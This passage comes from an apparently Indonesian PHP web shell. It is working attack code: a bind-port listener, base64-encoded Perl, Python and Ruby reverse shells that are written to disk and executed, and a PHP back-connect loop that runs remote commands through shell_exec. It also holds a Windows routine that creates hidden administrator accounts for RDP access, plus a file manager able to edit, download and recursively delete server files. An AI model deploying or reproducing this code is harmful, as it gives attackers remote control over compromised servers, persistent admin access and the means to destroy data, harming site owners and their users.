  1614. // Backconnect Tools
  1615. elseif($_GET['do'] == 'network') {
  1616. echo "
  1617. <div class='mybox'>
  1618. <h2>Bind Port</h2>
  1619. <form method='post'>
  1620. <table class='myboxtbl'>
  1621. <tr><td style='width:100px;'>Port</td><td><input type='text' class='inputz' placeholder='port' name='port_bind' value='1337'>
  1622. <input type='submit' class='inputzbut' name='sub_bp' value='Gas!!'>
  1623. </td>
  1624. </tr>
  1625. </table>
  1626. </form>
  1627. </div>
  1628. <div class='mybox'>
  1629. <h2>Back Connect</h2>
  1630. <form method='post'>
  1631. <table class='myboxtbl'>
  1632. <tr><td style='width:100px;'>Back Connect</td><td><input type='text' class='inputz' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'></td><tr>
  1633. <tr><td style='width:100px;'>Port</td><td><input type='text' placeholder='port' class='inputz' name='port_bc' value='1337'></td><tr>
  1634. <tr><td style='width:100px;'>Versi</td><td>&nbsp;&nbsp;&nbsp;<select class='select' name='backconnect' style='width: 100px;' height='10'>
  1635. <option value='perl'>Perl</option>
  1636. <option value='php'>PHP</option>
  1637. <option value='python'>Python</option>
  1638. <option value='ruby'>Ruby</option></select>
  1639. <input type='submit' class='inputzbut' value='Gas!!'>
  1640. </td>
  1641. </tr>
  1642. </table>
  1643. </form>
  1644. </div>
  1645. ";
  1646. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1647. if(isset($_POST['sub_bp'])) {
  1648. $f_bp = fopen("/tmp/bp.pl", "w");
  1649. fwrite($f_bp, base64_decode($bind_port_p));
  1650. fclose($f_bp);
  1651.  
  1652. $port = $_POST['port_bind'];
  1653. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1654. sleep(1);
  1655. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1656. unlink("/tmp/bp.pl");
  1657. }
  1658. if($_POST['backconnect'] == 'perl') {
  1659. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1660.  
  1661. $plbc=@fopen('bc.pl','w');
  1662. fwrite($plbc,$bc);
  1663. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1664. sleep(1);
  1665. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1666. unlink("bc.pl");
  1667. }
  1668. if($_POST['backconnect'] == 'python') {
  1669. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  1670.  
  1671. $pbcaa=@fopen('bcpyt.py','w');
  1672. fwrite($pbcaa,$becaa);
  1673. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1674. sleep(1);
  1675. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1676. unlink("bcpyt.py");
  1677. }
  1678. if($_POST['backconnect'] == 'ruby') {
  1679. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1680.  
  1681. $pbcaak=@fopen('bcruby.rb','w');
  1682. fwrite($pbcaak,$becaak);
  1683. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1684. sleep(1);
  1685. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1686. unlink("bcruby.rb");
  1687. }
  1688. if($_POST['backconnect'] == 'php') {
  1689. $ip = $_POST['server'];
  1690. $port = $_POST['port'];
  1691. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1692. if($errno != 0){
  1693. echo "<font color='red'>$errno : $errstr</font>";
  1694. } else if (!$sockfd) {
  1695. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1696. } else {
  1697. fputs ($sockfd ,"
  1698. \n{################################################################}
  1699. \n..:: BackConnect Php ::..
  1700. \n{################################################################}\n");
  1701. $dir = shell_exec("pwd");
  1702. $sysinfo = shell_exec("uname -a");
  1703. $time = Shell_exec("time");
  1704. $len = 1337;
  1705. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1706. while(!feof($sockfd)){ $cmdPrompt = '[mewek]#:> ';
  1707. fputs ($sockfd , $cmdPrompt );
  1708. $command= fgets($sockfd, $len);
  1709. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1710. }
  1711. fclose($sockfd);
  1712. }
  1713. }
  1714. echo "</p></div>";
  1715. }
  1716. // Crack RDP Tools
  1717. elseif($_GET['do'] == 'krdp_shell') {
  1718. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1719. if($_POST['create']) {
  1720. $user = htmlspecialchars($_POST['user']);
  1721. $pass = htmlspecialchars($_POST['pass']);
  1722. if(preg_match("/$user/", exe("net user"))) {
  1723. echo "[INFO] -> <font color=red>user <font color=#4c83af>$user</font> sudah ada</font>";
  1724. } else {
  1725. $add_user = exe("net user $user $pass /add");
  1726. $add_groups1 = exe("net localgroup Administrators $user /add");
  1727. $add_groups2 = exe("net localgroup Administrator $user /add");
  1728. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1729. echo "[ RDP ACCOUNT INFO ]<br>
  1730. ------------------------------<br>
  1731. IP: <font color=#4c83af>".$ip."</font><br>
  1732. Username: <font color=#4c83af>$user</font><br>
  1733. Password: <font color=#4c83af>$pass</font><br>
  1734. ------------------------------<br><br>
  1735. [ STATUS ]<br>
  1736. ------------------------------<br>
  1737. ";
  1738. if($add_user) {
  1739. echo "[add user] -> <font color='#4c83af'>Berhasil</font><br>";
  1740. } else {
  1741. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1742. }
  1743. if($add_groups1) {
  1744. echo "[add localgroup Administrators] -> <font color='#4c83af'>Berhasil</font><br>";
  1745. } elseif($add_groups2) {
  1746. echo "[add localgroup Administrator] -> <font color='#4c83af'>Berhasil</font><br>";
  1747. } elseif($add_groups3) {
  1748. echo "[add localgroup Administrateur] -> <font color='#4c83af'>Berhasil</font><br>";
  1749. } else {
  1750. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1751. }
  1752. echo "------------------------------<br>";
  1753. }
  1754. } elseif($_POST['s_opsi']) {
  1755. $user = htmlspecialchars($_POST['r_user']);
  1756. if($_POST['opsi'] == '1') {
  1757. $cek = exe("net user $user");
  1758. echo "Checking username <font color=#4c83af>$user</font> ....... ";
  1759. if(preg_match("/$user/", $cek)) {
  1760. echo "[ <font color=#4c83af>Sudah ada</font> ]<br>
  1761. ------------------------------<br><br>
  1762. <pre>$cek</pre>";
  1763. } else {
  1764. echo "[ <font color=red>belum ada</font> ]";
  1765. }
  1766. } elseif($_POST['opsi'] == '2') {
  1767. $cek = exe("net user $user Mewek");
  1768. if(preg_match("/$user/", exe("net user"))) {
  1769. echo "[change password: <font color=#4c83af>Mewek</font>] -> ";
  1770. if($cek) {
  1771. echo "<font color=#4c83af>Berhasil</font>";
  1772. } else {
  1773. echo "<font color=red>Gagal</font>";
  1774. }
  1775. } else {
  1776. echo "[INFO] -> <font color=red>user <font color=#4c83af>$user</font> belum ada</font>";
  1777. }
  1778. } elseif($_POST['opsi'] == '3') {
  1779. $cek = exe("net user $user /DELETE");
  1780. if(preg_match("/$user/", exe("net user"))) {
  1781. echo "[remove user: <font color=#4c83af>$user</font>] -> ";
  1782. if($cek) {
  1783. echo "<font color=#4c83af>Berhasil</font>";
  1784. } else {
  1785. echo "<font color=red>Gagal</font>";
  1786. }
  1787. } else {
  1788. echo "[INFO] -> <font color=red>user <font color=#4c83af>$user</font> belum ada</font>";
  1789. }
  1790. } else {
  1791. //
  1792. }
  1793. } else {
  1794. echo "-- Create RDP --<br>
  1795. <form method='post'>
  1796. <input type='text' name='user' placeholder='username' value='Mewek' required>
  1797. <input type='text' name='pass' placeholder='password' value='Mewek' required>
  1798. <input type='submit' name='create' value='>>'>
  1799. </form>
  1800. -- Option --<br>
  1801. <form method='post'>
  1802. <input type='text' name='r_user' placeholder='username' required>
  1803. <select name='opsi'>
  1804. <option value='1'>Cek Username</option>
  1805. <option value='2'>Ubah Password</option>
  1806. <option value='3'>Hapus Username</option>
  1807. </select>
  1808. <input type='submit' name='s_opsi' value='>>'>
  1809. </form>
  1810. ";
  1811. }
  1812. } else {
  1813. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1814. }
  1815. }
  1816. // New file
  1817. elseif($_GET['act'] == 'newfile') {
  1818. if($_POST['new_save_file']) {
  1819. $newfile = htmlspecialchars($_POST['newfile']);
  1820. $fopen = fopen($newfile, "a+");
  1821. if($fopen) {
  1822. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1823. } else {
  1824. $act = "<font color=red>permission denied</font>";
  1825. }
  1826. }
  1827. echo $act;
  1828. echo "<form method='post'>
  1829. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1830. <input type='submit' name='new_save_file' value='Submit'>
  1831. </form>";
  1832. }
  1833. // New folder
  1834. elseif($_GET['act'] == 'newfolder') {
  1835. if($_POST['new_save_folder']) {
  1836. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1837. if(!mkdir($new_folder)) {
  1838. $act = "<font color=red>permission denied</font>";
  1839. } else {
  1840. $act = "<script>window.location='?dir=".$dir."';</script>";
  1841. }
  1842. }
  1843. echo $act;
  1844. echo "<form method='post'>
  1845. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1846. <input type='submit' name='new_save_folder' value='Submit'>
  1847. </form>";
  1848. }
  1849. // Rename
  1850. elseif($_GET['act'] == 'rename_dir') {
  1851. if($_POST['dir_rename']) {
  1852. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1853. if($dir_rename) {
  1854. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1855. } else {
  1856. $act = "<font color=red>permission denied</font>";
  1857. }
  1858. echo "".$act."<br>";
  1859. }
  1860. echo "<form method='post'>
  1861. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1862. <input type='submit' name='dir_rename' value='rename'>
  1863. </form>";
  1864. }
  1865. // Delete
  1866. elseif($_GET['act'] == 'delete_dir') {
  1867. if(is_dir($dir)) {
  1868. if(is_writable($dir)) {
  1869. @rmdir($dir);
  1870. @exe("rm -rf $dir");
  1871. @exe("rmdir /s /q $dir");
  1872. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1873. } else {
  1874. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1875. }
  1876. }
  1877. echo $act;
  1878. }
  1879. // View Source
  1880. elseif($_GET['act'] == 'view') {
  1881. echo "Filename: <font color=#4c83af>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1882. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1883. }
  1884. // Edit Source
  1885. elseif($_GET['act'] == 'edit') {
  1886. if($_POST['save']) {
  1887. $save = file_put_contents($_GET['file'], $_POST['src']);
  1888. if($save) {
  1889. $act = "<font color=#4c83af>Saved!</font>";
  1890. } else {
  1891. $act = "<font color=red>permission denied</font>";
  1892. }
  1893. echo "".$act."<br>";
  1894. }
  1895. echo "Filename: <font color=#4c83af>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1896. echo "<form method='post'>
  1897. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1898. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1899. </form>";
  1900. }
  1901. // Rename
  1902. elseif($_GET['act'] == 'rename') {
  1903. if($_POST['do_rename']) {
  1904. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1905. if($rename) {
  1906. $act = "<script>window.location='?dir=".$dir."';</script>";
  1907. } else {
  1908. $act = "<font color=red>permission denied</font>";
  1909. }
  1910. echo "".$act."<br>";
  1911. }
  1912. echo "Filename: <font color=#4c83af>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1913. echo "<form method='post'>
  1914. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1915. <input type='submit' name='do_rename' value='rename'>
  1916. </form>";
  1917. }
  1918. // Delete
  1919. elseif($_GET['act'] == 'delete') {
  1920. $delete = unlink($_GET['file']);
  1921. if($delete) {
  1922. $act = "<script>window.location='?dir=".$dir."';</script>";
  1923. } else {
  1924. $act = "<font color=red>permission denied</font>";
  1925. }
  1926. echo $act;
  1927. } else {
  1928. if(is_dir($dir) === true) {
  1929. if(!is_readable($dir)) {
  1930. echo "<font color=red>can't open directory. ( not readable )</font>";
  1931. } else {
  1932. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1933. <tr>
  1934. <th class="th_home"><center>Name</center></th>
  1935. <th class="th_home"><center>Type</center></th>
  1936. <th class="th_home"><center>Size</center></th>
  1937. <th class="th_home"><center>Last Modified</center></th>
  1938. <th class="th_home"><center>Owner/Group</center></th>
  1939. <th class="th_home"><center>Permission</center></th>
  1940. <th class="th_home"><center>Action</center></th>
  1941. </tr>';
  1942. $scandir = scandir($dir);
  1943. foreach($scandir as $dirx) {
  1944. $dtype = filetype("$dir/$dirx");
  1945. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1946. if(function_exists('posix_getpwuid')) {
  1947. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1948. $downer = $downer['name'];
  1949. } else {
  1950. //$downer = $uid;
  1951. $downer = fileowner("$dir/$dirx");
  1952. }
  1953. if(function_exists('posix_getgrgid')) {
  1954. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1955. $dgrp = $dgrp['name'];
  1956. } else {
  1957. $dgrp = filegroup("$dir/$dirx");
  1958. }
  1959. if(!is_dir("$dir/$dirx")) continue;
  1960. if($dirx === '..') {
  1961. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1962. } elseif($dirx === '.') {
  1963. $href = "<a href='?dir=$dir'>$dirx</a>";
  1964. } else {
  1965. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1966. }
  1967. if($dirx === '.' || $dirx === '..') {
  1968. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1969. } else {
  1970. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1971. }
  1972. echo "<tr>";
  1973. echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/dtafalonso/yosemite-flat/512/Folder-icon.png' height='20' width='20'>$href</td>";
  1974. echo "<td class='td_home'><center>$dtype</center></td>";
  1975. echo "<td class='td_home'><center>-</center></th></td>";
  1976. echo "<td class='td_home'><center>$dtime</center></td>";
  1977. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1978. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1979. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1980. echo "</tr>";
  1981. }
  1982. }
  1983. } else {
  1984. echo "<font color=red>can't open directory.</font>";
  1985. }
  1986. foreach($scandir as $file) {
  1987. $ftype = filetype("$dir/$file");
  1988. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1989. $size = filesize("$dir/$file")/1024;
  1990. $size = round($size,3);
  1991. if(function_exists('posix_getpwuid')) {
  1992. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1993. $fowner = $fowner['name'];
  1994. } else {
  1995. //$downer = $uid;
  1996. $fowner = fileowner("$dir/$file");
  1997. }
  1998. if(function_exists('posix_getgrgid')) {
  1999. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2000. $fgrp = $fgrp['name'];
  2001. } else {
  2002. $fgrp = filegroup("$dir/$file");
  2003. }
  2004. if($size > 1024) {
  2005. $size = round($size/1024,2). 'MB';
  2006. } else {
  2007. $size = $size. 'KB';
  2008. }
  2009. if(!is_file("$dir/$file")) continue;
  2010. echo "<tr>";
  2011. echo "<td class='td_home'><img src='https://png.icons8.com/cotton/2x/copy.png' height='20' width='20'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2012. echo "<td class='td_home'><center>$ftype</center></td>";
  2013. echo "<td class='td_home'><center>$size</center></td>";
  2014. echo "<td class='td_home'><center>$ftime</center></td>";
  2015. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2016. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2017. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2018. echo "</tr>";
